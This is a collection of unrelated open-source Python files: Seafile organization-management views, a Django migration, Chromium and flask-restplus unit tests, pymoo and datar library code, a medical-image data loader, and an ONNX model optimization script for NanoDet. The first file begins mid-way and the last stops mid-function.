return seaserv.ccnet_threaded_rpc.unset_org_staff(org_id, username)
########## seafile rpc wrapper
def get_org_user_self_usage(org_id, username):
"""
Arguments:
- `org_id`:
- `username`:
"""
return seaserv.seafserv_threaded_rpc.get_org_user_quota_usage(org_id, username)
def get_org_user_quota(org_id, username):
return seaserv.seafserv_threaded_rpc.get_org_user_quota(org_id, username)
def get_org_quota(org_id):
return seaserv.seafserv_threaded_rpc.get_org_quota(org_id)
def is_org_repo(org_id, repo_id):
return True if seaserv.seafserv_threaded_rpc.get_org_id_by_repo_id(
repo_id) == org_id else False
########## views
@login_required_ajax
def org_add(request):
"""Handle ajax request to add org, and create org owner.
Arguments:
- `request`:
"""
if not request.user.is_staff or request.method != 'POST':
raise Http404
content_type = 'application/json; charset=utf-8'
url_prefix = gen_org_url_prefix(3)
post_data = request.POST.copy()
post_data['url_prefix'] = url_prefix
form = OrgRegistrationForm(post_data)
if form.is_valid():
email = form.cleaned_data['email']
password = <PASSWORD>.cleaned_data['<PASSWORD>']
org_name = form.cleaned_data['org_name']
url_prefix = form.cleaned_data['url_prefix']
try:
new_user = User.objects.create_user(email, password,
is_staff=False, is_active=True)
except User.DoesNotExist as e:
logger.error(e)
err_msg = 'Fail to create organization owner %s.' % email
return HttpResponse(json.dumps({'error': err_msg}),
status=403, content_type=content_type)
create_org(org_name, url_prefix, new_user.username)
return HttpResponse(json.dumps({'success': True}),
content_type=content_type)
else:
try:
err_msg = list(form.errors.values())[0][0]
except IndexError:
err_msg = list(form.errors.values())[0]
return HttpResponse(json.dumps({'error': str(err_msg)}),
status=400, content_type=content_type)
def gen_org_url_prefix(max_trial=None):
"""Generate organization url prefix automatically.
    If ``max_trial`` is larger than 0, retry that many times on failure.
Arguments:
- `max_trial`:
Returns:
    The url prefix if succeeded, otherwise ``None``.
"""
def _gen_prefix():
url_prefix = 'org_' + get_random_string(
6, allowed_chars='abcdefghijklmnopqrstuvwxyz0123456789')
if get_org_by_url_prefix(url_prefix) is not None:
logger.info("org url prefix, %s is duplicated" % url_prefix)
return None
else:
return url_prefix
try:
max_trial = int(max_trial)
except (TypeError, ValueError):
max_trial = 0
while max_trial >= 0:
ret = _gen_prefix()
if ret is not None:
return ret
else:
max_trial -= 1
logger.warning("Failed to generate org url prefix, retry: %d" % max_trial)
return None
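# A minimal usage sketch (hypothetical values, not part of the original module):
#
#   prefix = gen_org_url_prefix(3)   # e.g. 'org_x1y2z3'; retries up to 3 times on prefix collision
#   if prefix is None:
#       ...  # give up and report the error to the caller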
def org_register(request):
"""Allow a new user to register an organization account. A new
    organization will be created and associated with that user.
Arguments:
- `request`:
"""
login_bg_image_path = get_login_bg_image_path()
if request.method == 'POST':
form = OrgRegistrationForm(request.POST)
if ORG_AUTO_URL_PREFIX:
# generate url prefix automatically
url_prefix = gen_org_url_prefix(3)
if url_prefix is None:
messages.error(request, "Failed to create organization account, please try again later.")
return render(request, 'organizations/org_register.html', {
'form': form,
'login_bg_image_path': login_bg_image_path,
'org_auto_url_prefix': ORG_AUTO_URL_PREFIX,
})
post_data = request.POST.copy()
post_data['url_prefix'] = url_prefix
form = OrgRegistrationForm(post_data)
if form.is_valid():
name = form.cleaned_data['name']
email = form.cleaned_data['email']
password = form.cleaned_data['<PASSWORD>']
org_name = form.cleaned_data['org_name']
url_prefix = form.cleaned_data['url_prefix']
new_user = User.objects.create_user(email, password,
is_staff=False, is_active=True)
create_org(org_name, url_prefix, new_user.username)
new_org = get_org_by_url_prefix(url_prefix)
org_created.send(sender=None, org=new_org)
if name:
Profile.objects.add_or_update(new_user.username, name)
# login the user
new_user.backend = settings.AUTHENTICATION_BACKENDS[0]
login(request, new_user)
return HttpResponseRedirect(reverse('libraries'))
else:
form = OrgRegistrationForm()
service_url = get_service_url()
up = urlparse(service_url)
service_url_scheme = up.scheme
service_url_remaining = up.netloc + up.path
return render(request, 'organizations/org_register.html', {
'form': form,
'login_bg_image_path': login_bg_image_path,
'service_url_scheme': service_url_scheme,
'service_url_remaining': service_url_remaining,
'org_auto_url_prefix': ORG_AUTO_URL_PREFIX,
})
@login_required
@org_staff_required
def react_fake_view(request, **kwargs):
group_id = kwargs.get('group_id', '')
org = request.user.org
invitation_link = get_or_create_invitation_link(org.org_id) if ORG_ENABLE_ADMIN_INVITE_USER else ''
    # Whether to use the new page
return render(request, "organizations/org_admin_react.html", {
'org': org,
'org_member_quota_enabled': ORG_MEMBER_QUOTA_ENABLED,
'group_id': group_id,
'invitation_link': invitation_link,
})
@login_required
def org_associate(request, token):
"""Associate user with coresponding org.
Mainly used for new WeChat user on doc.seafile.com.
"""
username = request.user.username
# validate token
org_id = cache.get('org_associate_%s' % token, -1)
if org_id <= 0:
return render_error(request, _('Invalid token.'))
# get org info
org = ccnet_api.get_org_by_id(org_id)
if not org:
return render_error(request, 'Invalid org id')
# Log user in if he/she already belongs to any orgs.
orgs = ccnet_api.get_orgs_by_user(username)
if orgs:
return HttpResponseRedirect(settings.LOGIN_REDIRECT_URL)
# check org member quota
if ORG_MEMBER_QUOTA_ENABLED:
from seahub.organizations.models import OrgMemberQuota
org_members = len(ccnet_api.get_org_users_by_url_prefix(org.url_prefix,
-1, -1))
org_members_quota = OrgMemberQuota.objects.get_quota(org_id)
if org_members_quota is not None and org_members >= org_members_quota:
return render_error(request, 'Above quota')
set_org_user(org_id, username)
return HttpResponseRedirect(settings.LOGIN_REDIRECT_URL)
|
core/migrations/0012_auto_20200813_0238.py
|
Gitoffomalawn/babybuddy
| 922 |
79020
|
# Generated by Django 3.1 on 2020-08-13 02:38
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
("core", "0011_auto_20200214_1939"),
]
operations = [
migrations.AlterField(
model_name="note",
name="time",
field=models.DateTimeField(
default=django.utils.timezone.now, verbose_name="Time"
),
),
]
|
third_party/blink/tools/blinkpy/web_tests/layout_package/json_results_generator_unittest.py
|
zealoussnow/chromium
| 14,668 |
79021
|
<filename>third_party/blink/tools/blinkpy/web_tests/layout_package/json_results_generator_unittest.py
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import json
import unittest
from blinkpy.web_tests.layout_package import json_results_generator
class JSONGeneratorTest(unittest.TestCase):
def setUp(self):
self.builder_name = 'DUMMY_BUILDER_NAME'
self.build_number = 'DUMMY_BUILDER_NUMBER'
# For archived results.
self._json = None
self._num_runs = 0
self._tests_set = set([])
self._test_timings = {}
self._failed_count_map = {}
self._PASS_count = 0
self._DISABLED_count = 0
self._FLAKY_count = 0
self._FAILS_count = 0
self._fixable_count = 0
def test_strip_json_wrapper(self):
json = "['contents']"
self.assertEqual(
json_results_generator.
strip_json_wrapper(json_results_generator._JSON_PREFIX + json +
json_results_generator._JSON_SUFFIX), json)
self.assertEqual(json_results_generator.strip_json_wrapper(json), json)
def test_test_timings_trie(self):
individual_test_timings = []
individual_test_timings.append(
json_results_generator.TestResult(
'foo/bar/baz.html', elapsed_time=1.2))
individual_test_timings.append(
json_results_generator.TestResult('bar.html', elapsed_time=0.0001))
trie = json_results_generator.test_timings_trie(
individual_test_timings)
expected_trie = {
'bar.html': 0,
'foo': {
'bar': {
'baz.html': 1200,
}
}
}
self.assertEqual(json.dumps(trie), json.dumps(expected_trie))
|
pymoo/core/survival.py
|
jarreguit/pymoo
| 762 |
79025
|
from abc import abstractmethod
import numpy as np
from pymoo.core.population import Population
# ---------------------------------------------------------------------------------------------------------
# Survival
# ---------------------------------------------------------------------------------------------------------
class Survival:
def __init__(self, filter_infeasible=True):
super().__init__()
self.filter_infeasible = filter_infeasible
def do(self,
problem,
pop,
*args,
n_survive=None,
return_indices=False,
**kwargs):
# make sure the population has at least one individual
if len(pop) == 0:
return pop
if n_survive is None:
n_survive = len(pop)
n_survive = min(n_survive, len(pop))
# if the split should be done beforehand
if self.filter_infeasible and problem.n_constr > 0:
# split feasible and infeasible solutions
feas, infeas = split_by_feasibility(pop, eps=0.0, sort_infeasbible_by_cv=True)
if len(feas) == 0:
survivors = Population()
else:
survivors = self._do(problem, pop[feas], *args, n_survive=min(len(feas), n_survive), **kwargs)
# calculate how many individuals are still remaining to be filled up with infeasible ones
n_remaining = n_survive - len(survivors)
# if infeasible solutions needs to be added
if n_remaining > 0:
survivors = Population.merge(survivors, pop[infeas[:n_remaining]])
else:
survivors = self._do(problem, pop, *args, n_survive=n_survive, **kwargs)
if return_indices:
H = {}
for k, ind in enumerate(pop):
H[ind] = k
return [H[survivor] for survivor in survivors]
else:
return survivors
@abstractmethod
def _do(self, problem, pop, *args, n_survive=None, **kwargs):
pass
def split_by_feasibility(pop, eps=0.0, sort_infeasbible_by_cv=True):
CV = pop.get("CV")
b = (CV <= eps)
feasible = np.where(b)[0]
infeasible = np.where(~b)[0]
if sort_infeasbible_by_cv:
infeasible = infeasible[np.argsort(CV[infeasible, 0])]
return feasible, infeasible
def calc_adapt_eps(pop):
cv = pop.get("CV")[:, 0]
cv_mean = np.median(cv)
fr = (cv <= 0).sum() / len(cv)
return cv_mean * fr
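# A minimal subclassing sketch (assumed single-objective fitness truncation; not part of the original module):
#
#   class FitnessSurvival(Survival):
#       def _do(self, problem, pop, *args, n_survive=None, **kwargs):
#           F = pop.get("F")[:, 0]                  # single-objective fitness values
#           return pop[np.argsort(F)[:n_survive]]   # keep the n_survive best individuals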
|
datar/dplyr/mutate.py
|
stjordanis/datar
| 110 |
79028
|
<filename>datar/dplyr/mutate.py
"""Create, modify, and delete columns
See source https://github.com/tidyverse/dplyr/blob/master/R/mutate.R
"""
from typing import Any, Tuple, List, Union
from pandas import DataFrame, Series
from pipda import register_verb, evaluate_expr, ContextBase
from pipda.utils import CallingEnvs
from ..core.contexts import Context, ContextEval
from ..core.utils import (
dedup_name,
recycle_value,
arg_match,
df_setitem,
name_mutatable_args,
reconstruct_tibble,
)
from ..core.defaults import DEFAULT_COLUMN_PREFIX
from ..core.grouped import DataFrameGroupBy
from ..base import setdiff, union, intersect, c, NA
from .group_by import group_by_drop_default
from .group_data import group_vars, group_data
from .relocate import relocate
@register_verb(
DataFrame,
context=Context.PENDING,
extra_contexts={"_before": Context.SELECT, "_after": Context.SELECT},
)
def mutate(
_data: DataFrame,
*args: Any,
_keep: str = "all",
_before: Union[int, str] = None,
_after: Union[int, str] = None,
base0_: bool = None,
**kwargs: Any,
) -> DataFrame:
"""Adds new variables and preserves existing ones
The original API:
https://dplyr.tidyverse.org/reference/mutate.html
Args:
_data: A data frame
_keep: allows you to control which columns from _data are retained
in the output:
- "all", the default, retains all variables.
- "used" keeps any variables used to make new variables;
it's useful for checking your work as it displays inputs and
outputs side-by-side.
- "unused" keeps only existing variables not used to make new
variables.
- "none", only keeps grouping keys (like transmute()).
_before: and
_after: Optionally, control where new columns should appear
(the default is to add to the right hand side).
See relocate() for more details.
base0_: Whether `_before` and `_after` are 0-based if given by indexes.
If not provided, will use `datar.base.get_option('index.base.0')`
*args: and
**kwargs: Name-value pairs. The name gives the name of the column
in the output. The value can be:
- A vector of length 1, which will be recycled to the correct
length.
- A vector the same length as the current group (or the whole
data frame if ungrouped).
- None to remove the column
Returns:
An object of the same type as _data. The output has the following
properties:
- Rows are not affected.
- Existing columns will be preserved according to the _keep
argument. New columns will be placed according to the
_before and _after arguments. If _keep = "none"
(as in transmute()), the output order is determined only
by ..., not the order of existing columns.
- Columns given value None will be removed
- Groups will be recomputed if a grouping variable is mutated.
- Data frame attributes are preserved.
"""
keep = arg_match(_keep, "_keep", ["all", "unused", "used", "none"])
context = ContextEval()
cols, removed = _mutate_cols(_data, context, *args, **kwargs)
if cols is None:
cols = DataFrame(index=_data.index)
out = _data.copy()
# order is the same as _data
out[cols.columns.tolist()] = cols
# out.columns.difference(removed)
# changes column order when removed == []
out = out[setdiff(out.columns, removed, __calling_env=CallingEnvs.REGULAR)]
if _before is not None or _after is not None:
new = setdiff(
cols.columns,
_data.columns,
__calling_env=CallingEnvs.REGULAR,
)
out = relocate(
out,
*new,
_before=_before,
_after=_after,
base0_=base0_,
__calling_env=CallingEnvs.REGULAR,
)
if keep == "all":
keep = out.columns
elif keep == "unused":
used = context.used_refs.keys()
unused = setdiff(
_data.columns,
used,
__calling_env=CallingEnvs.REGULAR,
)
keep = intersect(
out.columns,
c(
group_vars(_data, __calling_env=CallingEnvs.REGULAR),
unused,
cols.columns,
),
__calling_env=CallingEnvs.REGULAR,
)
elif keep == "used":
used = context.used_refs.keys()
keep = intersect(
out.columns,
c(
group_vars(_data, __calling_env=CallingEnvs.REGULAR),
used,
cols.columns,
),
__calling_env=CallingEnvs.REGULAR,
)
else: # keep == 'none':
keep = union(
setdiff(
group_vars(_data, __calling_env=CallingEnvs.REGULAR),
cols.columns,
__calling_env=CallingEnvs.REGULAR,
),
intersect(
cols.columns,
out.columns,
__calling_env=CallingEnvs.REGULAR,
),
__calling_env=CallingEnvs.REGULAR,
)
out = out[keep]
return out.loc[[], :] if len(_data) == 0 else out
@mutate.register(DataFrameGroupBy, context=Context.PENDING)
def _(
_data: DataFrameGroupBy,
*args: Any,
_keep: str = "all",
_before: str = None,
_after: str = None,
base0_: bool = None,
**kwargs: Any,
) -> DataFrameGroupBy:
"""Mutate on DataFrameGroupBy object"""
def apply_func(df):
if isinstance(df, Series):
df = df.to_frame().T
index = df.attrs["_group_index"] = df.index[0]
df.attrs["_group_data"] = _data._group_data
rows = [index]
else:
index = df.attrs["_group_index"]
rows = df.attrs["_group_data"].loc[index, "_rows"]
ret = mutate(
df.reset_index(drop=True),
*args,
_keep=_keep,
_before=_before,
_after=_after,
base0_=base0_,
__calling_env=CallingEnvs.REGULAR,
**kwargs,
)
ret.index = rows
return ret
out = _data._datar_apply(apply_func, _drop_index=False).sort_index()
if out.shape[0] > 0:
# keep the original row order
# out.sort_index(inplace=True)
# not only DataFrameGroupBy but also DataFrameRowwise
return reconstruct_tibble(_data, out, keep_rowwise=True)
# 0-row
named = name_mutatable_args(*args, **kwargs)
df = DataFrame({key: [] for key in named})
out = _data.copy()
out[df.columns.tolist()] = df
return _data.__class__(
out,
_group_vars=group_vars(_data, __calling_env=CallingEnvs.REGULAR),
_group_drop=group_by_drop_default(_data),
_group_data=group_data(_data, __calling_env=CallingEnvs.REGULAR),
)
@register_verb(DataFrame, context=Context.PENDING)
def transmute(
_data: DataFrame,
*args: Any,
_before: Union[int, str] = None,
_after: Union[int, str] = None,
base0_: bool = None,
**kwargs: Any,
) -> DataFrame:
"""Mutate with _keep='none'
See Also:
[`mutate()`](datar.dplyr.mutate.mutate).
"""
return mutate(
_data,
*args,
_keep="none",
_before=_before,
_after=_after,
base0_=base0_,
__calling_env=CallingEnvs.REGULAR,
**kwargs,
)
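# A hedged usage sketch of mutate()/transmute() (hypothetical data, assuming datar's piping style):
#
#   >>> from datar.all import f, tibble
#   >>> df = tibble(x=[1, 2, 3])
#   >>> df >> mutate(y=f.x * 2)     # keeps x, adds y
#   >>> df >> transmute(y=f.x * 2)  # keeps only grouping keys and y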
def _mutate_cols(
_data: DataFrame,
_context: ContextBase,
*args: Any,
**kwargs: Any,
) -> Tuple[DataFrame, List[str]]:
"""Mutate columns"""
if not args and not kwargs:
return None, []
_data = _data.copy()
named_mutatables = name_mutatable_args(*args, **kwargs)
new_columns = []
removed = []
add_new_name = True
for name, mutatable in named_mutatables.items():
ddp_name = dedup_name(name, list(named_mutatables))
# if not a dedup name, it's a new name
add_new_name = ddp_name == name
mutatable = evaluate_expr(mutatable, _data, _context)
if mutatable is None:
if ddp_name in _data:
removed.append(ddp_name)
_data.drop(columns=[ddp_name], inplace=True)
# be silent if name doesn't exist
continue
if isinstance(mutatable, DataFrame):
if mutatable.shape[1] == 0 and not ddp_name.startswith(
DEFAULT_COLUMN_PREFIX
):
_data = df_setitem(
_data, ddp_name, [NA] * max(mutatable.shape[0], 1)
)
if add_new_name:
new_columns.append(ddp_name)
else:
for col in mutatable.columns:
new_name = (
col
if ddp_name.startswith(DEFAULT_COLUMN_PREFIX)
else f"{ddp_name}${col}"
)
coldata = recycle_value(
mutatable[col], _data.shape[0], ddp_name
)
_data = df_setitem(_data, new_name, coldata)
if add_new_name:
new_columns.append(new_name)
else:
mutatable = recycle_value(mutatable, _data.shape[0], ddp_name)
_data = df_setitem(_data, ddp_name, mutatable)
if add_new_name:
new_columns.append(ddp_name)
# keep column order
return _data[new_columns], removed
|
src/HyperDenseNet/Modules/IO/loadData.py
|
jiajunhua/josedolz-HyperDenseNet
| 147 |
79029
|
"""
Copyright (c) 2016, <NAME> .All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
<NAME>. April, 2018.
email: <EMAIL>
LIVIA Department, ETS, Montreal.
"""
import numpy as np
import pdb
# If you are not using nifti files you can comment this line
import nibabel as nib
import scipy.io as sio
from ImgOperations.imgOp import applyPadding
# ----- Loader for nifti files ------ #
def load_nii (imageFileName, printFileNames) :
if printFileNames == True:
print (" ... Loading file: {}".format(imageFileName))
img_proxy = nib.load(imageFileName)
imageData = img_proxy.get_data()
return (imageData,img_proxy)
def release_nii_proxy(img_proxy) :
img_proxy.uncache()
# ----- Loader for matlab format ------- #
# Very important: All the volumes should have been saved as 'vol'.
# Otherwise, change its name here
def load_matlab (imageFileName, printFileNames) :
if printFileNames == True:
print (" ... Loading file: {}".format(imageFileName))
mat_contents = sio.loadmat(imageFileName)
imageData = mat_contents['vol']
return (imageData)
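# A hypothetical usage sketch of the loaders above (placeholder paths; not part of the original module):
#
#   vol, proxy = load_nii('subject01_T1.nii.gz', True)
#   release_nii_proxy(proxy)                          # free the cached nifti data when done
#   vol_mat = load_matlab('subject01_T1.mat', False)  # the .mat file must store the volume as 'vol'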
""" It loads the images (CT/MRI + Ground Truth + ROI) for the patient image Idx"""
def load_imagesSinglePatient(imageIdx,
imageNames,
imageNames_Bottom,
groundTruthNames,
roiNames,
applyPaddingBool,
receptiveField,
sampleSizes,
imageType
):
if imageIdx >= len(imageNames) :
print (" ERROR!!!!! : The image index specified is greater than images array size....)")
exit(1)
# --- Load image data (CT/MRI/...) ---
printFileNames = False # Get this from config.ini
imageFileName = imageNames[imageIdx]
if imageType == 0:
[imageData,img_proxy] = load_nii(imageFileName, printFileNames)
else:
imageData = load_matlab(imageFileName, printFileNames)
if applyPaddingBool == True :
[imageData, paddingValues] = applyPadding(imageData, sampleSizes, receptiveField)
else:
paddingValues = ((0,0),(0,0),(0,0))
if len(imageData.shape) > 3 :
imageData = imageData[:,:,:,0]
if imageType == 0:
release_nii_proxy(img_proxy)
# --- Load image data for bottom path (CT/MRI/...) ---
printFileNames = False # Get this from config.ini
imageFileName = imageNames_Bottom[imageIdx]
if imageType == 0:
[imageData_Bottom,img_proxy] = load_nii(imageFileName, printFileNames)
else:
imageData_Bottom = load_matlab(imageFileName, printFileNames)
if applyPaddingBool == True :
[imageData_Bottom, paddingValues] = applyPadding(imageData_Bottom, sampleSizes, receptiveField)
else:
paddingValues = ((0,0),(0,0),(0,0))
if len(imageData_Bottom.shape) > 3 :
imageData_Bottom = imageData_Bottom[:,:,:,0]
if imageType == 0:
release_nii_proxy(img_proxy)
# --- Load ground truth (i.e. labels) ---
if len(groundTruthNames) > 0 :
GTFileName = groundTruthNames[imageIdx]
if imageType == 0:
[gtLabelsData, gt_proxy] = load_nii (GTFileName, printFileNames)
else:
gtLabelsData = load_matlab(GTFileName, printFileNames)
# Convert ground truth to int type
        if np.issubdtype(gtLabelsData.dtype, np.int):
            gtLabelsData = gtLabelsData
        else:
            # keep the converted array (the original discarded the result of this conversion)
            gtLabelsData = np.rint(gtLabelsData).astype("int32")
imageGtLabels = gtLabelsData
if imageType == 0:
# Release data
release_nii_proxy(gt_proxy)
if applyPaddingBool == True :
[imageGtLabels, paddingValues] = applyPadding(imageGtLabels, sampleSizes, receptiveField)
else :
imageGtLabels = np.empty(0)
# --- Load roi ---
if len(roiNames)> 0 :
roiFileName = roiNames[imageIdx]
if imageType == 0:
[roiMaskData, roi_proxy] = load_nii (roiFileName, printFileNames)
else:
roiMaskData = load_matlab(roiFileName, printFileNames)
roiMask = roiMaskData
if imageType == 0:
# Release data
release_nii_proxy(roi_proxy)
if applyPaddingBool == True :
[roiMask, paddingValues] = applyPadding(roiMask, sampleSizes, receptiveField)
else :
roiMask = np.ones(imageGtLabels.shape)
return [imageData, imageData_Bottom, imageGtLabels, roiMask, paddingValues]
# -------------------------------------------------------- #
def getRandIndexes(total, maxNumberIdx) :
    # Generate a shuffled array of a vector containing "total" elements
    idxs = list(range(total))  # list() so the indexes can be shuffled in place (range is not shuffleable on Python 3)
    np.random.shuffle(idxs)
rand_idxs = idxs[0:maxNumberIdx]
return rand_idxs
|
tests/test_accept.py
|
alanjcastonguay/flask-restplus
| 2,885 |
79035
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import flask_restplus as restplus
class Foo(restplus.Resource):
def get(self):
return "data"
class ErrorsTest(object):
def test_accept_default_application_json(self, app, client):
api = restplus.Api(app)
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers={'Accept': None})
assert res.status_code == 200
assert res.content_type == 'application/json'
def test_accept_application_json_by_default(self, app, client):
api = restplus.Api(app)
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'application/json')])
assert res.status_code == 200
assert res.content_type == 'application/json'
def test_accept_no_default_match_acceptable(self, app, client):
api = restplus.Api(app, default_mediatype=None)
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'application/json')])
assert res.status_code == 200
assert res.content_type == 'application/json'
def test_accept_default_override_accept(self, app, client):
api = restplus.Api(app)
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'text/plain')])
assert res.status_code == 200
assert res.content_type == 'application/json'
def test_accept_default_any_pick_first(self, app, client):
api = restplus.Api(app)
@api.representation('text/plain')
def text_rep(data, status_code, headers=None):
resp = app.make_response((str(data), status_code, headers))
return resp
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', '*/*')])
assert res.status_code == 200
assert res.content_type == 'application/json'
def test_accept_no_default_no_match_not_acceptable(self, app, client):
api = restplus.Api(app, default_mediatype=None)
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'text/plain')])
assert res.status_code == 406
assert res.content_type == 'application/json'
def test_accept_no_default_custom_repr_match(self, app, client):
api = restplus.Api(app, default_mediatype=None)
api.representations = {}
@api.representation('text/plain')
def text_rep(data, status_code, headers=None):
resp = app.make_response((str(data), status_code, headers))
return resp
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'text/plain')])
assert res.status_code == 200
assert res.content_type == 'text/plain'
def test_accept_no_default_custom_repr_not_acceptable(self, app, client):
api = restplus.Api(app, default_mediatype=None)
api.representations = {}
@api.representation('text/plain')
def text_rep(data, status_code, headers=None):
resp = app.make_response((str(data), status_code, headers))
return resp
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'application/json')])
assert res.status_code == 406
assert res.content_type == 'text/plain'
def test_accept_no_default_match_q0_not_acceptable(self, app, client):
"""
        q=0 should be considered NotAcceptable, but this depends on
        werkzeug >= 1.0, which is not yet released, so this test is expected
        to fail until we depend on werkzeug >= 1.0.
"""
api = restplus.Api(app, default_mediatype=None)
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'application/json; q=0')])
assert res.status_code == 406
assert res.content_type == 'application/json'
def test_accept_no_default_accept_highest_quality_of_two(self, app, client):
api = restplus.Api(app, default_mediatype=None)
@api.representation('text/plain')
def text_rep(data, status_code, headers=None):
resp = app.make_response((str(data), status_code, headers))
return resp
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'application/json; q=0.1, text/plain; q=1.0')])
assert res.status_code == 200
assert res.content_type == 'text/plain'
def test_accept_no_default_accept_highest_quality_of_three(self, app, client):
api = restplus.Api(app, default_mediatype=None)
@api.representation('text/html')
@api.representation('text/plain')
def text_rep(data, status_code, headers=None):
resp = app.make_response((str(data), status_code, headers))
return resp
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'application/json; q=0.1, text/plain; q=0.3, text/html; q=0.2')])
assert res.status_code == 200
assert res.content_type == 'text/plain'
def test_accept_no_default_no_representations(self, app, client):
api = restplus.Api(app, default_mediatype=None)
api.representations = {}
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'text/plain')])
assert res.status_code == 406
assert res.content_type == 'text/plain'
def test_accept_invalid_default_no_representations(self, app, client):
api = restplus.Api(app, default_mediatype='nonexistant/mediatype')
api.representations = {}
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'text/plain')])
assert res.status_code == 500
|
tools/optimize/nanodet_m-opt.py
|
zhouzy-creator/Tengine
| 4,697 |
79059
|
<gh_stars>1000+
# -*- coding: utf-8 -*-
# OPEN AI LAB is pleased to support the open source community by supporting Tengine available.
#
# Copyright (C) 2021 OPEN AI LAB. All rights reserved.
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
"""
This tool is mainly for optimizing the network structure of nanodet_m.ckpt from
https://github.com/RangiLyu/nanodet .
Preparation:
1. Export pytorch model to onnx by official tools/export_onnx.py, e.g.
$ python tools/export_onnx.py --cfg_path config/nanodet-m.yml --model_path nanodet_m.ckpt
Optimization:
1. Load onnx model and just simplify it:
$ python3 nanodet_m-opt.py --input nanodet_m.onnx --output nanodet_m-opt.onnx
Optimization (not recommended):
    1. Update the output shape in all distance prediction branches from [1, *, 32] to [1, *, 4, 8];
2. Add additional "Softmax" node in the end of all distance prediction branches with axis=-1;
3. Update output tensor name(from "dis_pred_stride_*" to "dis_sm_stride_*", in which "sm" is
short for "softmax") and shape(from [1, *, 32] to [1, *, 4, 8] for later integral);
4. Check and simplify new onnx model.
$ python3 nanodet_m-opt.py --input nanodet_m.onnx --output nanodet_m-opt.onnx --softmax --const 893,915,937
This tool is based on ONNX Framework.
Author:
<EMAIL>
History:
2021/06/26 create
"""
import argparse
import onnx
from onnxsim import simplify
def parse_args():
parser = argparse.ArgumentParser(description='NanoDet-m Optimize Tool Parameters')
parser.add_argument('--input', type=str, default='nanodet_m.onnx', help='input model path')
parser.add_argument('--output', type=str, default='nanodet_m-opt.onnx', help='output model path')
parser.add_argument('--const', type=str, default='893,915,937', help='constant(nodes) for final reshape node in distance prediction branch')
parser.add_argument("--softmax", action='store_true', default=False, help="add additional softmax node to distance prediction branch")
args = parser.parse_args()
return args
def optimize_node_shape(nodes, names):
"""
optimize input constant nodes of final reshape nodes in distance prediction branch
Args:
nodes: the graph.node of ONNX model
names: target constant node name list
Returns:
optimized graph nodes(inplace)
"""
## new shape value for "Constant" nodes
t = onnx.helper.make_tensor('', onnx.TensorProto.INT64, [4], [1, 4, 8, -1])
t = [onnx.helper.make_attribute(key, value) for key, value in {"value": t}.items()]
## new attribute for "Transpose" nodes
a = [onnx.helper.make_attribute(key, value) for key, value in {"perm":(0,3,1,2)}.items()]
reshape_output = []
for i, n in enumerate(nodes):
if 'Constant' == n.op_type and n.output[0] in names:
## replace attr with new one
n.attribute.pop()
n.attribute.extend(t)
#print(n)
continue
